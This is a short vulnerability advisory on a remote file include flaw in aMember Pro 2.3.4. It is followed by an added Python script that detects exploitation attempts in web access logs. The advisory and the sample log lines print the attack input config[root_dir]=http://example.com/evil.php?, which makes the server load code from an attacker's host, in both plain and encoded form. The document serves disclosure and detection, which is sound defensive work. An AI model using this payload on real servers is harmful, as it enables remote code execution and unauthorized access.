source: https://www.securityfocus.com/bid/14777/info

aMember is prone to a remote file include vulnerability.

Input passed to various scripts is not sufficiently sanitized. An attacker could host arbitrary malicious code in a file at an attacker-controlled site and include the file using a URI parameter.

This issue may be leveraged to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

aMember Pro 2.3.4 is reportedly affected; other versions may also be vulnerable.

config[root_dir]=http://example.com/evil.php?
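
For detection, the following added example (not part of the original advisory and not aMember code) scans web access-log lines for requests that set a config[...] parameter to a URL, the pattern shown above, including its percent-encoded form. The combined log format, the /amember/SCRIPT.php path and the client addresses are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample log lines; script path and client IPs are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Sep/2005:10:00:01 +0000] '
    '"GET /amember/SCRIPT.php?config[root_dir]=http://example.com/evil.php? HTTP/1.1" 200 512',
    '198.51.100.8 - - [10/Sep/2005:10:00:05 +0000] '
    '"GET /amember/SCRIPT.php?config%5Broot_dir%5D=hTTp%3A%2F%2Fexample.com%2Fevil.php%3F HTTP/1.1" 200 512',
    '203.0.113.4 - - [10/Sep/2005:10:01:00 +0000] '
    '"GET /amember/SCRIPT.php?id=4&ref=http://example.org/ HTTP/1.1" 200 900',
    '203.0.113.5 - - [10/Sep/2005:10:02:00 +0000] '
    '"GET /amember/SCRIPT.php HTTP/1.1" 200 300',
]

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that address the config array, e.g. config[root_dir].
CONFIG_PARAM_RE = re.compile(r'^config\[[^\]]*\]$', re.IGNORECASE)
# Values that begin with a URL scheme (http://, ftp://, ...).
REMOTE_VALUE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def find_config_overrides(line):
    """Return (name, value) pairs where a config[...] parameter holds a URL."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    # Everything after the first '?' is the query string.
    query = match.group(1).partition('?')[2]
    hits = []
    # parse_qsl percent-decodes names and values, so encoded requests match too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if CONFIG_PARAM_RE.match(name) and REMOTE_VALUE_RE.match(value):
            hits.append((name, value))
    return hits


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for name, value in find_config_overrides(entry):
            print(f"suspicious override: {name} = {value!r}")
```

Only query strings are inspected here; the same check applies to POST bodies if the application accepts the parameter there and the body is logged.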